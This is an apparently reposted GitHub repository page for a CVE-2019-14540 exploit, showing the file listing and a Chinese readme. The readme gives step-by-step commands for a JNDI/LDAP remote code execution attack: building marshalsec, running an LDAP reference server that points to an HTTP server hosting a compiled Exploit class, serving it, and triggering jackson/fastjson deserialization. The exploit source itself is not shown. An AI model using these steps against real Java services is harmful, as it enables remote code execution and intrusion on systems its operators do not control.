GitHub - LeadroyaL/cve-2019-14540-exploit: CVE-2019-14540 Exploit
2019-08-22 19:34:58
Author: github.com(查看原文)
阅读量:300
收藏
Join GitHub today
GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.
Sign up
Java
Permalink
| Type |
Name |
Latest commit message |
Commit time |
|
Failed to load latest commit information. |
|
gradle/wrapper
|
init commit
|
Aug 21, 2019
|
|
|
remote_codebase
|
init commit
|
Aug 21, 2019
|
|
|
src/main/java/com/leadroyal/cve_2019_14540
|
init commit
|
Aug 21, 2019
|
|
|
.gitignore
|
init commit
|
Aug 21, 2019
|
|
|
build.gradle
|
init commit
|
Aug 21, 2019
|
|
|
demo.png
|
init commit
|
Aug 21, 2019
|
|
|
gradlew
|
init commit
|
Aug 21, 2019
|
|
|
gradlew.bat
|
init commit
|
Aug 21, 2019
|
|
|
readme.md
|
init commit
|
Aug 21, 2019
|
|
|
settings.gradle
|
init commit
|
Aug 21, 2019
|
http://www.leadroyal.cn/?p=939
环境限制:因为本demo使用 jndi 的 ldap 利用方式,需要使用低版本(小于8u191)的 jdk。
1. 使用marshalsec,在本地1389端口创建 ldap 服务,指向本地8000的 http 服务
git clone https://github.com/mbechler/marshalsec.git
mvn package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit" 1389
2. 在 remote_codebase 里编译用于远程加载的代码
cd remote_codebase
javac Exploit.java
3. 在 remote_codebase 里开启本地8000的 http 服务
cd remote_codebase
python -m SimpleHTTPServer
4. 运行 Main.java,使用 jackson 和 fastjson 反序列化触发漏洞
文章来源: https://github.com/LeadroyaL/cve-2019-14540-exploit
如有侵权请联系:admin#unsafe.sh
